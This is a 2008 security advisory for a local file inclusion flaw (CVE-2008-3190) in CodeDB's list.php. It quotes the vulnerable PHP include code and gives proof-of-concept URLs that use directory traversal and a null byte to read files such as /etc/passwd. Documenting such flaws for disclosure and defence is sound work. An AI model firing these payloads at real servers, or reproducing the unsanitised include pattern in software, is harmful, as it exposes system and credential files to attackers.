Topic : | CodeDB (list.php lang) Local File Inclusion Vulnerability
|
SecurityAlert : 4001
CVE : CVE-2008-3190
CWE : Not in CWE
SecurityRisk : Medium (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : cOndemned
Published : 17.07.2008
Affected Software : | CodeDB |
 Advisory Content : ###########################################################################
####
#
# Name : CodeDB (list.php lang) Local File Inclusion Vulnerability
# Author : cOndemned
# Greetz : ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura
;*
#
###########################################################################
####
Source :
// list.php
2. $lang = htmlspecialchars($_GET['lang']); // ok, but....
for what ? lol
7. if(file_exists('templates/'.$lang.'_middle.php')) // We'll have
to cut off rest of filename & extension
8. include('templates/'.$lang.'_middle.php'); // Ekhm... pwned
;d
Proof of Concept :
http://[host]/[codeDB_path]/list.php?lang=../readme.txt%00
http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd%00
http://[host]/[codeDB_path]/list.php?lang=../[local_file]%00
EoF.
References :
http://securityreason.com/expldownload/1/4333/1 (Exploit)
http://xforce.iss.net/xforce/xfdb/43761
http://www.securityfocus.com/bid/30227
http://www.milw0rm.com/exploits/6071
http://www.frsirt.com/english/advisories/2008/2105/references
http://secunia.com/advisories/31053
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|